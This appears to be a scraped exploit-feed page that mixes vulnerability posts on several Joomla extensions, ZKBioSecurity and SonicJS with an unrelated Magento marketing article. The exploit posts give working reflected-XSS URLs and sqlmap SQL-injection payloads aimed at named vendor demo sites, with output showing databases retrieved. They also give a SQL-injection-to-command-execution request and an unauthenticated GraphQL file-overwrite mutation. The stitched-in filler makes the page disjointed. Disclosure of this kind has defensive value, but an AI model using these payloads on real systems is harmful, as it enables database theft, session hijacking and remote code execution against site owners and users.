Joomla Easy Shop extension version 1.4.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : JoomTech - joomtech.net                                                    ││  Software : Joomla Easy Shop 1.4.1                                                     ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path:/supermarket/index.phpGET parameter 'file' is vulnerable to XSShttps://demo.joomtech.net/supermarket/index.php?option=com_easyshop&task=ajax.loadImage&file=YXNzZXRzL2ltYWdlcy91c2VyX2N1c3RvbWVycy81NjMvYmFubmVyMi5qcGdzcW9obDxpbWcgc3JjPWEgb25lcnJvcj1hbGVydCgxKT5peG1kYw%3d%3d&size=medium[-] Done

Joomla Easy Shop 1.4.1 Cross Site Scripting

Joomla JUX Charity Hub extension version 1.0.4 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : JoomlaUX - joomlaux.com                                                    ││  Software : JUX Charity Hub 1.0.4 Extension for Joomla                                 ││  Vuln Type: SQL Injection                                                              ││  Method   : GET                                                                        ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise                                                                     ││                                                                                        ││                                                                                        ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /extensions/charityhub/index.php/causes/grid-causes/grid-causes-no-sidebar/causesGET parameter 'title' is vulnerable---Parameter: title (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)    Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=-7388' OR 2114=2114#&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=1' AND (SELECT 4175 FROM(SELECT COUNT(*),CONCAT(0x71707a7871,(SELECT (ELT(4175=4175,1))),0x717a626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- GUzX&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=1' AND (SELECT 8556 FROM (SELECT(SLEEP(5)))SnfZ)-- awOv&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search---[+] Starting the Attack[INFO] the back-end DBMS is MySQLweb application technology: PHP 7.3.19back-end DBMS: MySQL >= 5.0 (MariaDB fork)[INFO] fetching current databasecurrent database: 'joomlaux_charityhub2'[-] Done

Joomla JUX Charity Hub 1.0.4 SQL Injection

By Owais Sultan
Patience is no longer a virtue when talking about website or app performance. Users get frustrated after waiting for…
This is a post from HackRead.com Read the original post: MySQL Performance Tuning: Top 5 Tips for Blazing Fast Queries

MySQL Performance Tuning: Top 5 Tips for Blazing Fast Queries

By Owais Sultan
Over the last decade, a couple of aspects have changed within the tech world and Magento is no…
This is a post from HackRead.com Read the original post: Magento 1 vs Magento 2

Over the last decade, a couple of aspects have changed within the tech world and **Magento** is no exception. Although Magento has gained a loyal customer base with its first product it was not without its problems. Magento 2 was released to resolve some of these issues however, it received mixed reviews.

Magento has launched the **latest Magento version** which is an upgrade from Magento 1. In this article, we will go over the specific comparison of Magento 1 against Magento 2.

**Magento 1 vs Magento 2**

The primary distinction that exists between Magento 1 and Magento 2 is that Magento 2 is faster, SEO-friendly, and more user-friendly in comparison to Magento 1. 

Magento 2 supports the latest PHP and improves performance overall on the website. It will process more orders in an hour and pages load quicker that Magento 1. 

Along with cleaner code and an easy-to-use dashboard, Magento 2 includes meta tags for **improved SEO**. They were absent in Magento 1.

Before we dig into details, let’s do a quick comparison:

**Magento 1**

**Magento 2**

Apache 2.x

Apache 2.2 / 2.4

Nginx 1.7 or more

PHP 5.2.x — 5.5.x

PHP 5.6.x 7.0.2 / 7.0.2 / 7.0.6

MySQL

MySQL Percona / MySQL MySQL Percona 5.6.x or greater

Varnish 3.x or 4.x

Redis 2.x / 3.x or Memcached 1.4.x

Solr (Only for EE)

Solr 4.x

HTML

HTML5

JQuery (In the most current themes)

JQuery

RequireJS/ Knockout.js

Zend Framework 1

Zend Framework 1 / 2

Symfony

Composer

PSR – 0/1 2 / 3 4

Now let’s discuss the difference in various factors.

**Architecture**

The major problem that Magento 1 has is Magento 1 is the store performance, which has been substantially enhanced with Magento 2.

Magento team has transformed the stack dramatically by adding diverse new technologies, including Apache, Composer, Symfony, and Nginx 1.7 or higher. The main differences in Architecture are:

*   Advanced browser caching for static content.  
    
*   The reduction in the number of unnecessary browser operations on the client’s part because of bundled and reduced JavaScript.  
    
*   Magento 2 supports the most current PHP versions. These versions have security enhancements that impact the speed of the store.

Magento 2 supports the Zend Framework 1 and 2 (instead of just Zend Framework 1 for Magento 1). Magento 2 is also now compatible with **MySQL Percona 5.6** and greater.

Magento 2 has also added new technologies that aren’t accessible in Magento 1. This includes the following:

**NGINX:** Open-source Web server which functions as a reverse proxy and HTTP cache and load-balancer.

**Varnish:** It is a cost-effective alternative for web acceleration that could improve the speed of your Magento 2 website.

**Composer:** The tool used for managing dependency in PHP that allows users to use third-party libraries, without having to bundle them with source code. It can also help reduce conflicts with extensions.

**Symfony:** Symfony is a PHP Web application framework that helps you to manage the contents, functionality, as well as design of your web store.

**Redis:** A free source storage of data structures in memory that serves as a cache for databases or broker of messages.

**Speed**: Magento 2 offers a faster page loading speed when compared with Magento 1.

Due to the full-page caching feature, Magento offers both Community and Enterprise Edition.

**A few stats from Magento 2 compared to Magento 1.**:

*   Processing 39 percent more orders in an hour  
    
*   Up to 51% speedier end-to-end checkout times  
    
*   Rapid server response time for catalog browsing  
    
*   You can enjoy the possibility of up to 66% speedier time for add-to-cart server responses

Magento 1 has an average speed of loading pages that exceeds two seconds. This is a concern due to studies have revealed that sales conversions decrease dramatically for each second of load time. According to this Google Webmaster **video**, 2 seconds is the minimum requirement for eCommerce websites’ acceptance.

Magento 2 is faster all across frontend performance. It has page loading speeds that are about 50 percent faster for the homepage and pages for products.

**Payment gateway**

The ability to let your customers pay using the payment method that is the most familiar to them will help in creating trust and increasing the conversion rate of your online business.

In Magento 1, the eCommerce software merchants can connect most of the most popular payment gateways to be used on their Magento website. This usually involves integration with a third party or developing work on a custom basis.

Contrary to Magento 1, Magento 2 now supports the most widely used payment gateways in a seamless manner, without the need for additional integrations. Accepted gateways are PayPal, Braintree, and Authorize.net.

**Extensions**

There are a lot of third extension extensions that are available on the marketplace for Magento 1.

The issue in Magento 1 was the extension conflicts. More than one extension attempts to modify the functionality. This problem could only be addressed manually in the past it became a costly and time-consuming procedure.

But Magento 2 allows code to overlay with the core code, but not override it.

Making changes and installing new extensions is now more convenient and easy on the pocket.

The procedure of installing extensions and modifying functions is much more natural as a result of the latest technologies (HTML5, CSS3, Require.js) implemented within Magento 2.

**Customer support**

Sometimes, you need assistance to make your store work exactly how you want it to. What version of there is one that will give you that assistance?

In Magento 1, as the product is now sunset it is no longer receiving updates or patches from Magento to run your store. It’s your own, on your own, in a lifeboat drifting in the sea.

When using Magento 2, the level of support for customers varies based on the version you’re working with. In our introduction, Magento 2 covers both Magento Open Source, Magento Enterprise Edition as well as Enterprise Cloud Edition. Only the last two choices offer support, but they are expensive cost. Magento Open Source is free to download but doesn’t come with customer service.

**Dashboard**

The admin panel of Magento 2 is user-friendly and interactive.

It makes it easy to find information quickly, allows access to all areas in the administration panel, and helps you manage your store more effectively.

Magento 2 offers a full dashboard that displays the lifetime sales, the average orders, last orders, the top keywords including revenue tax, as well as numerous other features.

However, Magento 1 has a messy design.

**Organic online presence and SEO**

Magento 2 has not made an impressive leap over Magento 1 in terms of SEO. However, it’s far superior to Magento 1.

Some important Magento characteristics that Magento 1 isn’t able to provide:

*   **Mobile-Friendly:** Magento 2 is extremely optimized for Mobiles. It’s also an important ranking factor.  
    
*   **Duplicate content:** Magento 2 provides a Canonical tag, which means that there’s no way to a problem with duplicate content.  
    
*   **Meta Title Meta Description, Meta Keywords:** Magento 2.2.0 allows meta tags to be used on individual pages.

**Security**

Magento has boosted the algorithms for hashing (SHA-256) that are used for password management. Magento now is able to support Argon2ID13 via the PHP sodium extension, which requires libraries **libsodium** version 1.0.13 or greater.

The password should not be your main concern if you’re working with Magento 1. The real threat is that Magento is removing support in June 2020.

There are no security patches, updates, or issues that are resolved for Magento any longer.

Open Source Platform with no support for the platform makes it vulnerable.

**Pricing**

Even though the community versions of Magento can be downloaded for free.

However, there’s a slight difference in the price of the Enterprise Edition of Magento 1 and Magento 2.

*   **Magento EE license cost:** starts at $18,000 annually  
    
*   **Price for Magento 2. EE:** starting at $22,000 annually

The version for the community of Magento 2 is free.

Magento 2 Enterprise Solutions Edition price begins with $22,000.00 annually for businesses with lower than one million dollars in revenue and pricing tiers go up based upon the amount of revenue.

**Why should you migrate from Magento 1 to Magento 2?**

In the near future, Magento 1 support will end.

If you don’t have plans to move from Magento 2, create one.

For support, improved user interface, sleek dashboard, speedy loading, and overall improved platform that your website deserves.

Follow these steps to **migrate the website from Magento 1 to Magento 2** with ease.

**Why aren’t users migrating from Magento 2?**

Magento 2 has many more functions however, many people aren’t making the switch. Many stores are still using Magento 1 despite the End of Life.

**The reasons are:**

*   **The Fear of Change:** The transition to a new system always causes anxiety. It is difficult to step out of their comfort zone. However, sooner or later, you will have to make the decision.  
    
*   **Customer Satisfaction:** Magento 1 customers are satisfied with M1. They don’t have a reason to move their stores elsewhere.  
    
*   **Magento 2 extensions:** M2 offers numerous functions, however, it’s not yet fully developed. M1 includes a wealth of extensions, and tools as well as helping communities across the internet.  
    
*   **Extremely expensive migration:** The process of moving between Magento 1 to Magento 2 is not an easy upgrade. It’s a totally different platform that has its advantages and disadvantages, as well as an extensive learning curve. It requires a lot of time and a substantial budget.

**Conclusion**

Magento 2 is better than Magento 1 on every scale. However, there are many guides as well as resources and communities centered around Magento 1. Since Magento 1 is present for several years, it has plenty of space that the platform.

Hiring a professional **Magento development** firm would be a good idea if you are planning to migrate to Magento 2. With time, Magento 2 will garner the same or even more of the internet.

Magento 1 vs Magento 2

ZKSecurity BIO version 4.1.2 suffers from a remote SQL injection vulnerability that can allow for remote code execution.

    #######################ADVISORY INFORMATION#######################Product: ZKSecurity BIOVendor: ZKTeco (https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)Version Affected: 4.1.2CVE: CVE-2022-36635Vulnerability: SQL Injection (with a plus: RCE)#######################CREDIT#######################This vulnerability was discovered and researched by Caio Burgardt andSilton Santos.#######################INTRODUCTION#######################Based on the hybrid biometric technology and computer vision technology,ZKBioSecurity provides a comprehensive web-based security platform. Itcontains multiple integrated modules: personnel, time & attendance, accesscontrol, visitor management, offline & online consumption management, guardpatrol, parking, elevator control, entrance control, Facekiosk, intelligentvideo management, mask and temperature detection module, and other smartsub-systems.#######################VULNERABILITY DETAILS#######################The parameters opTimeBegin e opTimeEnd are simply concatenated to the SQLquery, with only a sanitization filter in front of it. Using comments(/**/) in place of spaces was enough to confuse and bypass the filter.#######################PROOF OF CONCEPT#######################Note that the request delayed 10s:POST /baseOpLog.do HTTP/1.1Host: {HOST}Content-Type: application/x-www-form-urlencodedCookie: SESSION={COOKIE}; menuType=icon-onlyContent-Length: 208list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50if you use the next query, you can execute remote command:list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='#######################END#######################

ZKSecurity BIO 4.1.2 SQL Injection / Code Execution

Joomla MyMuse extension version 4.3.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Gordon Fisch - joomlamymuse.com                                            ││  Software : MyMuse 4.3.0 Extension for Joomla                                          ││  Vuln Type: SQL Injection                                                              ││  Method   : GET                                                                        ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise                                                                     ││                                                                                        ││                                                                                        ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.php/en/mymuse-views/list-of-tracks?filter_alpha=AGET parameter 'filter_alpha' is vulnerable---Parameter: filter_alpha (GET)    Type: boolean-based blind    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)    Payload: filter_alpha=A%' AND MAKE_SET(5052=5052,3360) AND 'xQKG%'='xQKG&filter_order=a.title ASC&limit=10&start=10    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)    Payload: filter_alpha=A%' AND EXTRACTVALUE(2078,CONCAT(0x5c,0x716a6b7671,(SELECT (ELT(2078=2078,1))),0x71627a7671)) AND 'QXSg%'='QXSg&filter_order=a.title ASC&limit=10&start=10    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: filter_alpha=A%' AND (SELECT 5976 FROM (SELECT(SLEEP(5)))vLkv) AND 'tLCw%'='tLCw&filter_order=a.title ASC&limit=10&start=10---[+] Starting the Attack[INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL >= 5.1[INFO] fetching current databaseINFO] retrieved: '*********'current database: ''*********''[-] Done

Joomla MyMuse 4.3.0 SQL Injection

Joomla JS Jobs Pro extension version 1.3.6 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Joom Sky - joomsky.com                                                     ││  Software : JS Jobs Pro 1.3.6 JobPortal for Joomla                                     ││  Vuln Type: SQL Injection                                                              ││  Method   : POST                                                                       ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise                                                                     ││                                                                                        ││                                                                                        ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /js-jobs/jm/pro/index.php/employer-control-panel/resume-search-resultsPOST parameter 'nationality' is vulnerable---Parameter: nationality (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind - Parameter replace    Payload: title=&name=&nationality=(CASE WHEN (5462=5462) THEN SLEEP(5) ELSE 5462 END)&gender=&jobcategory=&jobsubcategory=&jobtype=&currency=&jobsalaryrange=&heighestfinisheducation=&experiencemin=&experiencemax=&keywords=&submit_app=Resume Search&isresumesearch=1&view=resume&layout=resume_searchresults&uid=0&option=com_jsjobs&task11=view---[+] Starting the Attack[INFO] the back-end DBMS is MySQLweb application technology: LiteSpeedback-end DBMS: MySQL >= 5.0.12 (MariaDB fork)[INFO] fetching current databasecurrent database: 'demjomsk_jmjsjobs'[-] Done

Joomla JS Jobs Pro 1.3.6 SQL Injection

Joomla jMarket extension version 5.15 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                      [ Exploits ]                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : extensions.joomla.org                                                      │  
│  Vendor   : Joobi                                                                      │  
│  Software : jMarket 5.15 Multi-Vendor Shopping Cart for Joomla                         │  
│  Vuln Type: Reflected XSS                                                              │  
│  Method   : GET                                                                        │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                              B4nks-NET irc.b4nks.tk #unix                             ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2022                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

GET parameter 'controller' is vulnerable to XSS

https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-resultsqmzro%22onmouseover=%22alert(1)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22rqo95my69wy

GET parameter 'trucs%5Bx%5D%5Bsearch%5D' is vulnerable to XSS

https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs%5Bx%5D%5Bsearch%5D=gx3vt%20onfocus%3dalert(1)%20autofocus%3d%20itkrzsug7w5&trucs%5Bx%5D%5Bcatid%5D=28&option=com_jvouchers&Itemid=236&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&trucs%5Bs%5D%5Bmid%5D=182&trucs%5Bs%5D%5Bpkey%5D=pid&trucs%5B182%5D%5Bpid%5D=0&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWwmY2F0YWxvZ1NlYXJjaElucHV0U2l6ZT0xMDAlJmF1dG9zYXZlPTE%3D

GET parameter 'vWjx' is vulnerable to XSS

https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=home&wajx=1&wmjx=1&tmpl=component&type=raw&limitstartw44_a45a2eb907d344c4d11b95b39a363661=20&vWjx=sabif%20onmouseover%3dalert(1)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20ax650sfkaze&vWdjx=44&fRmjx=wf_catalog_results_catalog_search_results&trucs%5Bx%5D%5Bsearch%5D=Search...&choicesorting=newest&option=com_jvouchers&Itemid=236&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&limitstartw44_a45a2eb907d344c4d11b95b39a363661=0&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWw%3D

GET parameter 'Itemid' is vulnerable to XSS

https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs%5Bx%5D%5Bsearch%5D=Search...&trucs%5Bx%5D%5Bcatid%5D=28&option=com_jvouchers&Itemid=is9fk%20onfocus%3dalert(1)%20autofocus%3d%20f7adumy8lgl&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&trucs%5Bs%5D%5Bmid%5D=182&trucs%5Bs%5D%5Bpkey%5D=pid&trucs%5B182%5D%5Bpid%5D=0&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWwmY2F0YWxvZ1NlYXJjaElucHV0U2l6ZT0xMDAlJmF1dG9zYXZlPTE%3D

GET parameter 'trucs%5B182%5D%5Bpid%5D' is vulnerable to XSS

https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs%5Bx%5D%5Bsearch%5D=Search...&trucs%5Bx%5D%5Bcatid%5D=28&option=com_jvouchers&Itemid=236&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&trucs%5Bs%5D%5Bmid%5D=182&trucs%5Bs%5D%5Bpkey%5D=pid&trucs%5B182%5D%5Bpid%5D=ugb9n%20onmouseover%3dalert(1)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20zn67rnvkbhb&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWwmY2F0YWxvZ1NlYXJjaElucHV0U2l6ZT0xMDAlJmF1dG9zYXZlPTE%3D

[-] Done

Joomla jMarket 5.15 Cross Site Scripting

SonicJS through 0.6.0 allows file overwrite. It has the following mutations that are used for updating files: fileCreate and fileUpdate. Both of these mutations can be called without any authentication to overwrite any files on a SonicJS application, leading to Arbitrary File Write and Delete.

GraphQL is an API query language developed by Facebook in 2015. Since then, its unique features and capabilities have made it a viable alternative to REST APIs. When it comes to security, GraphQL servers can house several types of misconfigurations that result in data compromise, access control issues, and other high risk vulnerabilities.

While security issues with GraphQL are widely known, there’s little information on finding them  outside of using dynamic analysis. In this post, we’ll discuss how common GraphQL vulnerabilities present in a codebase, as well as and how to find them using static analysis tools and GraphQL Security. Since many widely used GraphQL frameworks exist within npm, we’ll focus on examples from the NodeJS ecosystem. 

**Taint analysis through GraphQL frameworks**

SQL injection and deserialization vulnerabilities have been reported in numerous studies on GraphQL endpoints. An example of this can be seen in HackerOne’s report where a SQL Injection is present through a GraphQL parameter. 

Like REST API parameters, GraphQL arguments are a source of taint where user input can be introduced to an application. Static analysis tools should be able to identify and model these parameters accurately in an application. 

In GraphQL frameworks, resolvers map between schema, function, and arguments before being passed through to resolver functions. The following example depicts the **args** argument as an object that contains all GraphQL arguments that were provided for the field by the GraphQL operation.

    const resolvers = {
      Query: {
        user(parent, args, context, info) {
          return runFunction(args.parameter);
        }
      }
    }

These args expressions can be traced by the Snyk Code engine, which leverages points-to analysis and typestate analysis to accurately record program execution. The Snyk Code analysis of SonicJS, a modern open source NodeJs based content management system, is a helpful example. 

SonicJS helps users conduct CMS operations through their GraphQL endpoint. One such operation is the fileUpdate mutation operation which allows a user to update their files.

        fileUpdate: {
          type: FileType,
          args: {
            filePath: { type: new GraphQLNonNull(GraphQLString) },
            fileContent: { type: new GraphQLNonNull(GraphQLString) },
            sessionID: { type: GraphQLString },
          },
          resolve(parent, args) {
            fileService.writeFile(args.filePath, args.fileContent);
            let fileData = new FileData(args.filePath, args.fileContent);
            return fileData;
          },

(source code)

This mutation query takes user-provided input calledargs.filePathand args.fileContent and this is then provided to the writeFile function of the fileService object. The function implementation of the fileService object exists in server/services/file.service.jsand can be seen below.

        writeFile: async function (filePath, fileContent) {
          Let fullPath = path.join(this.getRootAppPath(), filePath);
          Await fsPromise.writeFile(fullPath, fileContent);
        },

(source code)

This function takes both GraphQL arguments and uses the fs.writeFile function to update the file on the provided path. However, this function can be exploited to traverse the given application directory and create a new file anywhere in the target system, like in the following GraphQL query: 

    mutation {
    
    fileUpdate(
    filePath: "../../../../../../../../../../../../tmp/test.txt",
    fileContent: "exploitable",
    sessionID:"nosessioncheckinplace"
    ){
    filePath
    fileContent
    }
    }

